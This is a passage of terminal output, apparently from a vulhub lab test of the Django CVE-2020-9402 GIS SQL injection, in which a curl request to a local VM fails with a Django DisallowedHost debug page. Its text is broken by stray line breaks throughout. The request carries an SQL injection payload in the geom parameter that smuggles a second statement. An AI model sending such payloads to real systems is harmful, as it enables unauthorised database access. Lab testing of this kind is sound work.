zzz@zzz
-virtual
-machine
:~/Desktop$ curl "http
://192.168.2
0.128
:8
000/vuln/?geom=SRID=4
326;SELECT%2
0version();
--"
<!DOCTYPE html>
<html lang="en">
<head>
<meta http
-equiv="content
-type" content="text/html; charset=utf
-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>DisallowedHost
at /vuln/</title>
<style type="text/css">
html * { padding
:0; margin
:0; }
body * { padding
:1
0px 2
0px; }
body * * { padding
:0; }
body { font
:small sans
-serif; background
-color
:#fff; color
:#000; }
body>div { border
-bottom
:1px solid
#ddd; }
h1 { font
-weight
:normal; }
h2 { margin
-bottom
:.8em; }
h
3 { margin
:1em
0 .5em
0; }
h4 { margin
:0 0 .5em
0; font
-weight
: normal; }
code, pre { font
-size
: 1
00%; white
-space
: pre
-wrap; }
table { border
:1px solid
#ccc; border
-collapse
: collapse; width
:1
00%; background
:white; }
tbody td, tbody th { vertical
-align
:top; padding
:2px
3px; }
thead th {
padding
:1px 6px 1px
3px; background
:#fefefe; text
-align
:left;
font
-weight
:normal; font
-size
:11px; border
:1px solid
#ddd;
}
tbody th { width
:12em; text
-align
:right; color
:#666; padding
-right
:.5em; }
table.vars { margin
:5px
0 2px 4
0px; }
table.vars td, table.req td { font
-family
:monospace; }
table td.code { width
:1
00%; }
table td.code pre { overflow
:hidden; }
table.source th { color
:#666; }
table.source td { font
-family
:monospace; white
-space
:pre; border
-bottom
:1px solid
#eee; }
ul.traceback { list
-style
-type
:none; color
: #222; }
ul.traceback li.frame { padding
-bottom
:1em; color
:#4f4f4f; }
ul.traceback li.user { background
-color
:#e
0e
0e
0; color
:#000 }
div.context { padding
:1
0px
0; overflow
:hidden; }
div.context ol { padding
-left
:30px; margin
:0 1
0px; list
-style
-position
: inside; }
div.context ol li { font
-family
:monospace; white
-space
:pre; color
:#777; cursor
:pointer; padding
-left
: 2px; }
div.context ol li pre { display
:inline; }
div.context ol.context
-line li { color
:#464646; background
-color
:#dfdfdf; padding
: 3px 2px; }
div.context ol.context
-line li span { position
:absolute; right
:32px; }
.user div.context ol.context
-line li { background
-color
:#bbb; color
:#000; }
.user div.context ol li { color
:#666; }
div.commands { margin
-left
: 4
0px; }
div.commands a { color
:#555; text
-decoration
:none; }
.user div.commands a { color
: black; }
#summary { background
: #ffc; }
#summary h2 { font
-weight
: normal; color
: #666; }
#explanation { background
:#eee; }
#template,
#template
-not
-exist { background
:#f6f6f6; }
#template
-not
-exist ul { margin
: 0 0 1
0px 2
0px; }
#template
-not
-exist .postmortem
-section { margin
-bottom
: 3px; }
#unicode
-hint { background
:#eee; }
#traceback { background
:#eee; }
#requestinfo { background
:#f6f6f6; padding
-left
:12
0px; }
#summary table { border
:none; background
:transparent; }
#requestinfo h2,
#requestinfo h
3 { position
:relative; margin
-left
:-1
00px; }
#requestinfo h
3 { margin
-bottom
:-1em; }
.error { background
: #ffc; }
.specific { color
:#cc
3300; font
-weight
:bold; }
h2 span.commands { font
-size
:.7em; font
-weight
:normal; }
span.commands a
:link {color
:#5E5694;}
pre.exception_value { font
-family
: sans
-serif; color
: #575757; font
-size
: 1.5em; margin
: 1
0px
0 1
0px
0; }
.append
-bottom { margin
-bottom
: 1
0px; }
</style>
<script type="text/javascript">
function hideAll(elems) {
for (var e =
0; e < elems.length; e++) {
elems[e].style.display = &
#39;none&
#39;;
}
}
window.onload = function() {
hideAll(document.querySelectorAll(&
#39;table.vars&
#39;));
hideAll(document.querySelectorAll(&
#39;ol.pre
-context&
#39;));
hideAll(document.querySelectorAll(&
#39;ol.post
-context&
#39;));
hideAll(document.querySelectorAll(&
#39;div.pastebin&
#39;));
}
function toggle() {
for (var i =
0; i < arguments.length; i++) {
var e = document.
getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == &
#39;none&
#39; ? &
#39;block&
#39;
: &
#39;none&
#39;;
}
}
return false;
}
function varToggle(link, id) {
toggle(&
#39;v&
#39; + id);
var s = link.getElementsByTagName(&
#39;span&
#39;)[
0];
var uarr = String.fromCharCode(
0x25b6);
var darr = String.fromCharCode(
0x25bc);
s.textContent = s.textContent == uarr ? darr
: uarr;
return false;
}
function switchPastebinFriendly(link) {
s1 = "Switch to copy
-and
-paste view";
s2 = "Switch back to interactive view";
link.textContent = link.textContent.trim() == s1 ? s2
: s1;
toggle(&
#39;browserTraceback&
#39;, &
#39;pastebinTraceback&
#39;);
return false;
}
</script>
</head>
<body>
<div id="summary">
<h1>DisallowedHost
at /vuln/</h1>
<pre class="exception_value">Invalid HTTP_HOST header
: &
#39;192.168.2
0.128
:8
000&
#39;. You may need to add &
#39;192.168.2
0.128&
#39; to ALLOWED_HOSTS.</pre>
<table class="meta">
<tr>
<th>Request Method
:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL
:</th>
<td>http
://192.168.2
0.128
:8
000/vuln/?geom=SRID=4
326;SELECT%2
0version();
--</td>
</tr>
<tr>
<th>Django Version
:</th>
<td>
3.
0.
3</td>
</tr>
<tr>
<th>Exception Type
:</th>
<td>DisallowedHost</td>
</tr>
<tr>
<th>Exception Value
:</th>
<td><pre>Invalid HTTP_HOST header
: &
#39;192.168.2
0.128
:8
000&
#39;. You may need to add &
#39;192.168.2
0.128&
#39; to ALLOWED_HOSTS.</pre></td>
</tr>
<tr>
<th>Exception Location
:</th>
<td>/usr/local/lib/python
3.1
0/dist
-packages/django/http/request.py in get_host, line 122</td>
</tr>
<tr>
<th>Python Executable
:</th>
<td>/usr/bin/python
3</td>
</tr>
<tr>
<th>Python Version
:</th>
<td>
3.1
0.12</td>
</tr>
<tr>
<th>Python Path
:</th>
<td><pre>[&
#39;/root/django_cve_2
02
0_94
02&
#39;,
&
#39;/usr/lib/python
31
0.zip&
#39;,
&
#39;/usr/lib/python
3.1
0&
#39;,
&
#39;/usr/lib/python
3.1
0/lib
-dynload&
#39;,
&
#39;/usr/local/lib/python
3.1
0/dist
-packages&
#39;,
&
#39;/usr/lib/python
3/dist
-packages&
#39;]</pre></td>
</tr>
<tr>
<th>Server
time:</th>
<td>Sun,
30 Nov 2
025 15
:1
3:5
0 +
0000</td>
</tr>
</table>
</div>
<div id="traceback">
<h2>Traceback <span class="commands"><a href="
#" onclick="return switchPastebinFriendly(this);">
Switch to copy
-and
-paste view</a></span>
</h2>
<div id="browserTraceback">
<ul class="traceback">
<li class="frame django">
<code>/usr/local/lib/python
3.1
0/dist
-packages/django/core/handlers/exception.py</code> in <code>inner</code>
<div class="context" id="c1
39
32262226944
0">
<ol start="27" class="pre
-context" id="pre1
39
32262226944
0">
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> This decorator is automatically applied to all middleware to ensure that</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> no middleware leaks an exception and that the next middleware in the stack</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> can rely on getting a response instead of an exception.</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> """</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> @wraps(get_response)</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> def inner(request)
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> try
:</pre></li>
</ol>
<ol start="
34" class="context
-line">
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> response = get_response(request)</pre> <span>…</span></li>
</ol>
<ol start=&
#39;
35&
#39; class="post
-context" id="post1
39
32262226944
0">
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> except Exception as exc
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> response = response_for_exception(request, exc)</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> return response</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre> return inner</pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre></pre></li>
<li onclick="toggle(&
#39;pre1
39
32262226944
0&
#39;, &
#39;post1
39
32262226944
0&
#39;)"><pre></pre></li>
</ol>
</div>
<div class="commands">
<a href="
#" onclick="return varToggle(this, &
#39;1
39
32262226944
0&
#39;)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v1
39
32262226944
0">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>exc</td>
<td class="code"><pre>DisallowedHost("Invalid HTTP_HOST header
: &
#39;192.168.2
0.128
:8
000&
#39;. You may need to add &
#39;192.168.2
0.128&
#39; to ALLOWED_HOSTS.")</pre></td>
</tr>
<tr>
<td>get_response</td>
<td class="code"><pre><django.middleware.common.CommonMiddleware object at
0x7eb69
376d9c
0></pre></td>
</tr>
<tr>
<td>request</td>
<td class="code"><pre><WSGIRequest
: GET &
#39;/vuln/?geom=SRID=4
326;SELECT%2
0version();
--&
#39;></pre></td>
</tr>
</tbody>
</table>
</li>
<li class="frame django">
<code>/usr/local/lib/python
3.1
0/dist
-packages/django/utils/deprecation.py</code> in <code>__call__</code>
<div class="context" id="c1
39
322622271488">
<ol start="86" class="pre
-context" id="pre1
39
322622271488">
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> def __init__(self, get_response=None)
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> self.get_response = get_response</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> super().__init__()</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre></pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> def __call__(self, request)
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> response = None</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> if hasattr(self, &
#39;process_request&
#39;)
:</pre></li>
</ol>
<ol start="9
3" class="context
-line">
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> response = self.process_request(request)</pre> <span>…</span></li>
</ol>
<ol start=&
#39;94&
#39; class="post
-context" id="post1
39
322622271488">
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> response = response or self.get_response(request)</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> if hasattr(self, &
#39;process_response&
#39;)
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> response = self.process_response(request, response)</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622271488&
#39;, &
#39;post1
39
322622271488&
#39;)"><pre> return response</pre></li>
</ol>
</div>
<div class="commands">
<a href="
#" onclick="return varToggle(this, &
#39;1
39
322622271488&
#39;)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v1
39
322622271488">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>request</td>
<td class="code"><pre><WSGIRequest
: GET &
#39;/vuln/?geom=SRID=4
326;SELECT%2
0version();
--&
#39;></pre></td>
</tr>
<tr>
<td>response</td>
<td class="code"><pre>None</pre></td>
</tr>
<tr>
<td>self</td>
<td class="code"><pre><django.middleware.common.CommonMiddleware object at
0x7eb69
376d9c
0></pre></td>
</tr>
</tbody>
</table>
</li>
<li class="frame django">
<code>/usr/local/lib/python
3.1
0/dist
-packages/django/middleware/common.py</code> in <code>process_request</code>
<div class="context" id="c1
39
322622275264">
<ol start="41" class="pre
-context" id="pre1
39
322622275264">
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> user_agent = request.META.get(&
#39;HTTP_USER_AGENT&
#39;)</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> if user_agent is not None
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> for user_agent_regex in settings.DISALLOWED_USER_AGENTS
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> if user_agent_regex.search(user_agent)
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> raise PermissionDenied(&
#39;Forbidden user agent&
#39;)</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre></pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre>
# Check for a redirect based on settings.PREPEND_WWW</pre></li>
</ol>
<ol start="48" class="context
-line">
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> host = request.get_host()</pre> <span>…</span></li>
</ol>
<ol start=&
#39;49&
#39; class="post
-context" id="post1
39
322622275264">
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> must_prepend = settings.PREPEND_WWW and host and not host.startswith(&
#39;www.&
#39;)</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> redirect_url = (&
#39;%s
://www.%s&
#39; % (request.scheme, host)) if must_prepend else &
#39;&
#39;</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre></pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre>
# Check if a slash should be appended</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> if self.should_redirect_with_slash(request)
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622275264&
#39;, &
#39;post1
39
322622275264&
#39;)"><pre> path = self.get_full_path_with_slash(request)</pre></li>
</ol>
</div>
<div class="commands">
<a href="
#" onclick="return varToggle(this, &
#39;1
39
322622275264&
#39;)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v1
39
322622275264">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>request</td>
<td class="code"><pre><WSGIRequest
: GET &
#39;/vuln/?geom=SRID=4
326;SELECT%2
0version();
--&
#39;></pre></td>
</tr>
<tr>
<td>self</td>
<td class="code"><pre><django.middleware.common.CommonMiddleware object at
0x7eb69
376d9c
0></pre></td>
</tr>
<tr>
<td>user_agent</td>
<td class="code"><pre>&
#39;curl/7.81.
0&
#39;</pre></td>
</tr>
</tbody>
</table>
</li>
<li class="frame django">
<code>/usr/local/lib/python
3.1
0/dist
-packages/django/http/request.py</code> in <code>get_host</code>
<div class="context" id="c1
39
322622272448">
<ol start="115" class="pre
-context" id="pre1
39
322622272448">
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> return host</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> else
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> msg = "Invalid HTTP_HOST header
: %r." % host</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> if domain
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> msg += " You may need to add %r to ALLOWED_HOSTS." % domain</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> else
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> msg += " The domain name provided is not valid according to RFC 1
034/1
035."</pre></li>
</ol>
<ol start="122" class="context
-line">
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> raise DisallowedHost(msg)</pre> <span>…</span></li>
</ol>
<ol start=&
#39;12
3&
#39; class="post
-context" id="post1
39
322622272448">
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre></pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> def get_port(self)
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> """Return the port number for the request as a string."""</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> if settings.USE_X_FORWARDED_PORT and &
#39;HTTP_X_FORWARDED_PORT&
#39; in self.META
:</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> port = self.META[&
#39;HTTP_X_FORWARDED_PORT&
#39;]</pre></li>
<li onclick="toggle(&
#39;pre1
39
322622272448&
#39;, &
#39;post1
39
322622272448&
#39;)"><pre> else
:</pre></li>
</ol>
</div>
<div class="commands">
<a href="
#" onclick="return varToggle(this, &
#39;1
39
322622272448&
#39;)"><span>▶</span> Local vars</a>
</div>
<table class="vars" id="v1
39
322622272448">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>allowed_hosts</td>
<td class="code"><pre>[&
#39;localhost&
#39;, &
#39;127.
0.
0.1&
#39;, &
#39;[
::1]&
#39;]</pre></td>
</tr>
<tr>
<td>domain</td>
<td class="code"><pre>&
#39;192.168.2
0.128&
#39;</pre></td>
</tr>
<tr>
<td>host</td>
<td class="code"><pre>&
#39;192.168.2
0.128
:8
000&
#39;</pre></td>
</tr>
<tr>
<td>msg</td>
<td class="code"><pre>("Invalid HTTP_HOST header
: &
#39;192.168.2
0.128
:8
000&
#39;. You may need to add "
"&
#39;192.168.2
0.128&
#39; to ALLOWED_HOSTS.")</pre></td>
</tr>
<tr>
<td>port</td>
<td class="code"><pre>&
#39;8
000&
#39;</pre></td>
</tr>
<tr>
<td>self</td>
<td class="code"><pre><WSGIRequest
: GET &
#39;/vuln/?geom=SRID=4
326;SELECT%2
0version();
--&
#39;></pre></td>
</tr>
</tbody>
</table>
</li>
</ul>
</div>
<form action="http
://dpaste.com/" name="pasteform" id="pasteform" method="post">
<div id="pastebinTraceback" class="pastebin">
<input type="hidden" name="language" value="PythonConsole">
<input type="hidden" name="title"
value="DisallowedHost at /vuln/">
<input type="hidden" name="source" value="Django Dpaste Agent">
<input type="hidden" name="poster" value="Django">
<textarea name="content" id="traceback_area" cols="14
0" rows="25">
Environment
:
Request Method
: GET
Request URL
: http
://192.168.2
0.128
:8
000/vuln/?geom=SRID=4
326;SELECT%2
0version();
--
Django Version
: 3.
0.
3
Python Version
: 3.1
0.12
Installed Applications
:
[&
#39;django.contrib.admin&
#39;,
&
#39;django.contrib.auth&
#39;,
&
#39;django.contrib.contenttypes&
#39;,
&
#39;django.contrib.sessions&
#39;,
&
#39;django.contrib.messages&
#39;,
&
#39;django.contrib.staticfiles&
#39;,
&
#39;app&
#39;]
Installed Middleware
:
[&
#39;django.middleware.security.SecurityMiddleware&
#39;,
&
#39;django.contrib.sessions.middleware.SessionMiddleware&
#39;,
&
#39;django.middleware.common.CommonMiddleware&
#39;,
&
#39;django.middleware.csrf.CsrfViewMiddleware&
#39;,
&
#39;django.contrib.auth.middleware.AuthenticationMiddleware&
#39;,
&
#39;django.contrib.messages.middleware.MessageMiddleware&
#39;,
&
#39;django.middleware.clickjacking.XFrameOptionsMiddleware&
#39;]
Traceback (most recent call last)
:
File "/usr/local/lib/python
3.1
0/dist
-packages/django/core/handlers/exception.py", line
34, in inner
response = get_response(request)
File "/usr/local/lib/python
3.1
0/dist
-packages/django/utils/deprecation.py", line 9
3, in __call__
response = self.process_request(request)
File "/usr/local/lib/python
3.1
0/dist
-packages/django/middleware/common.py", line 48, in process_request
host = request.get_host()
File "/usr/local/lib/python
3.1
0/dist
-packages/django/http/request.py", line 122, in get_host
raise DisallowedHost(msg)
Exception Type
: DisallowedHost at /vuln/
Exception Value
: Invalid HTTP_HOST header
: &
#39;192.168.2
0.128
:8
000&
#39;. You may need to add &
#39;192.168.2
0.128&
#39; to ALLOWED_HOSTS.
</textarea>
<br><br>
<input type="submit" value="Share this traceback on a public website">
</div>
</form>
</div>
<div id="requestinfo">
<h2>Request information</h2>
<h
3 id="user
-info">USER</h
3>
<p>[unable to retrieve the current user]</p>
<h
3 id="get
-info">GET</h
3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>geom</td>
<td class="code"><pre>&
#39;SRID=4
326&
#39;</pre></td>
</tr>
<tr>
<td>SELECT version()</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>
--</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
</tbody>
</table>
<h
3 id="post
-info">POST</h
3>
<p>No POST data</p>
<h
3 id="files
-info">FILES</h
3>
<p>No FILES data</p>
<h
3 id="cookie
-info">COOKIES</h
3>
<p>No cookie data</p>
<h
3 id="meta
-info">META</h
3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>COLORTERM</td>
<td class="code"><pre>&
#39;truecolor&
#39;</pre></td>
</tr>
<tr>
<td>CONTENT_LENGTH</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>CONTENT_TYPE</td>
<td class="code"><pre>&
#39;text/plain&
#39;</pre></td>
</tr>
<tr>
<td>DEBUGINFOD_URLS</td>
<td class="code"><pre>&
#39;&
#39;</pre></td>
</tr>
<tr>
<td>DISPLAY</td>
<td class="code"><pre>&
#39;
:0&
#39;</pre></td>
</tr>
<tr>
<td>DJANGO_SETTINGS_MODULE</td>
<td class="code"><pre>&
#39;vuln.settings&
#39;</pre></td>
</tr>
<tr>
<td>GATEWAY_INTERFACE</td>
<td class="code"><pre>&
#39;CGI/1.1&
#39;</pre></td>
</tr>
<tr>
<td>HOME</td>
<td class="code"><pre>&
#39;/root&
#39;</pre></td>
</tr>
<tr>
<td>HTTP_ACCEPT</td>
<td class="code"><pre>&
#39;*/*&
#39;</pre></td>
</tr>
<tr>
<td>HTTP_HOST</td>
<td class="code"><pre>&
#39;192.168.2
0.128
:8
000&
#39;</pre></td>
</tr>
<tr>
<td>HTTP_USER_AGENT</td>
<td class="code"><pre>&
#39;curl/7.81.
0&
#39;</pre></td>
</tr>
<tr>
<td>LANG</td>
<td class="code"><pre>&
#39;en_US.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LANGUAGE</td>
<td class="code"><pre>&
#39;en_US
:&
#39;</pre></td>
</tr>
<tr>
<td>LC_ADDRESS</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_IDENTIFICATION</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_MEASUREMENT</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_MONETARY</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_NAME</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_NUMERIC</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_PAPER</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_TELEPHONE</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LC_
TIME</td>
<td class="code"><pre>&
#39;zh_CN.UTF
-8&
#39;</pre></td>
</tr>
<tr>
<td>LESSCLOSE</td>
<td class="code"><pre>&
#39;/usr/bin/lesspipe %s %s&
#39;</pre></td>
</tr>
<tr>
<td>LESSOPEN</td>
<td class="code"><pre>&
#39;| /usr/bin/lesspipe %s&
#39;</pre></td>
</tr>
<tr>
<td>LOGNAME</td>
<td class="code"><pre>&
#39;root&
#39;</pre></td>
</tr>
<tr>
<td>LS_COLORS</td>
<td class="code"><pre>&
#39;rs=
0:di=
01;
34
:ln=
01;
36
:mh=
00:pi=4
0;
33:so=
01;
35
:do=
01;
35
:bd=4
0;
33;
01
:cd=4
0;
33;
01
:or=4
0;
31;
01
:mi=
00:su=
37;41
:sg=
30;4
3:ca=
30;41
:tw=
30;42
:ow=
34;42
:st=
37;44
:ex=
01;
32
:*.tar=
01;
31
:*.tgz=
01;
31
:*.arc=
01;
31
:*.arj=
01;
31
:*.taz=
01;
31
:*.lha=
01;
31
:*.lz4=
01;
31
:*.lzh=
01;
31
:*.lzma=
01;
31
:*.tlz=
01;
31
:*.txz=
01;
31
:*.tzo=
01;
31
:*.t7z=
01;
31
:*.zip=
01;
31
:*.z=
01;
31
:*.dz=
01;
31
:*.gz=
01;
31
:*.lrz=
01;
31
:*.lz=
01;
31
:*.lzo=
01;
31
:*.xz=
01;
31
:*.zst=
01;
31
:*.tzst=
01;
31
:*.bz2=
01;
31
:*.bz=
01;
31
:*.tbz=
01;
31
:*.tbz2=
01;
31
:*.tz=
01;
31
:*.deb=
01;
31
:*.rpm=
01;
31
:*.jar=
01;
31
:*.war=
01;
31
:*.ear=
01;
31
:*.sar=
01;
31
:*.rar=
01;
31
:*.alz=
01;
31
:*.ace=
01;
31
:*.zoo=
01;
31
:*.cpio=
01;
31
:*.7z=
01;
31
:*.rz=
01;
31
:*.cab=
01;
31
:*.wim=
01;
31
:*.swm=
01;
31
:*.dwm=
01;
31
:*.esd=
01;
31
:*.jpg=
01;
35
:*.jpeg=
01;
35
:*.mjpg=
01;
35
:*.mjpeg=
01;
35
:*.gif=
01;
35
:*.bmp=
01;
35
:*.pbm=
01;
35
:*.pgm=
01;
35
:*.ppm=
01;
35
:*.tga=
01;
35
:*.xbm=
01;
35
:*.xpm=
01;
35
:*.tif=
01;
35
:*.tiff=
01;
35
:*.png=
01;
35
:*.svg=
01;
35
:*.svgz=
01;
35
:*.mng=
01;
35
:*.pcx=
01;
35
:*.mov=
01;
35
:*.mpg=
01;
35
:*.mpeg=
01;
35
:*.m2v=
01;
35
:*.mkv=
01;
35
:*.webm=
01;
35
:*.webp=
01;
35
:*.ogm=
01;
35
:*.mp4=
01;
35
:*.m4v=
01;
35
:*.mp4v=
01;
35
:*.vob=
01;
35
:*.qt=
01;
35
:*.nuv=
01;
35
:*.wmv=
01;
35
:*.asf=
01;
35
:*.rm=
01;
35
:*.rmvb=
01;
35
:*.flc=
01;
35
:*.avi=
01;
35
:*.fli=
01;
35
:*.flv=
01;
35
:*.gl=
01;
35
:*.dl=
01;
35
:*.xcf=
01;
35
:*.xwd=
01;
35
:*.yuv=
01;
35
:*.cgm=
01;
35
:*.emf=
01;
35
:*.ogv=
01;
35
:*.ogx=
01;
35
:*.aac=
00;
36
:*.au=
00;
36
:*.flac=
00;
36
:*.m4a=
00;
36
:*.mid=
00;
36
:*.midi=
00;
36
:*.mka=
00;
36
:*.mp
3=
00;
36
:*.mpc=
00;
36
:*.ogg=
00;
36
:*.ra=
00;
36
:*.wav=
00;
36
:*.oga=
00;
36
:*.opus=
00;
36
:*.spx=
00;
36
:*.xspf=
00;
36
:&
#39;</pre></td>
</tr>
<tr>
<td>MAIL</td>
<td class="code"><pre>&
#39;/var/mail/root&
#39;</pre></td>
</tr>
<tr>
<td>OLDPWD</td>
<td class="code"><pre>&
#39;/root/vulhub/django/CVE
-2
02
0-94
02/src&
#39;</pre></td>
</tr>
<tr>
<td>PATH</td>
<td class="code"><pre>&
#39;/xp/server/docker
:/usr/local/sbin
:/usr/local/bin
:/usr/sbin
:/usr/bin
:/sbin
:/bin
:/snap/bin
:/xp/server/docker&
#39;</pre></td>
</tr>
<tr>
<td>PATH_INFO</td>
<td class="code"><pre>&
#39;/vuln/&
#39;</pre></td>
</tr>
<tr>
<td>PWD</td>
<td class="code"><pre>&
#39;/root/django_cve_2
02
0_94
02&
#39;</pre></td>
</tr>
<tr>
<td>QUERY_STRING</td>
<td class="code"><pre>&
#39;geom=SRID=4
326;SELECT%2
0version();
--&
#39;</pre></td>
</tr>
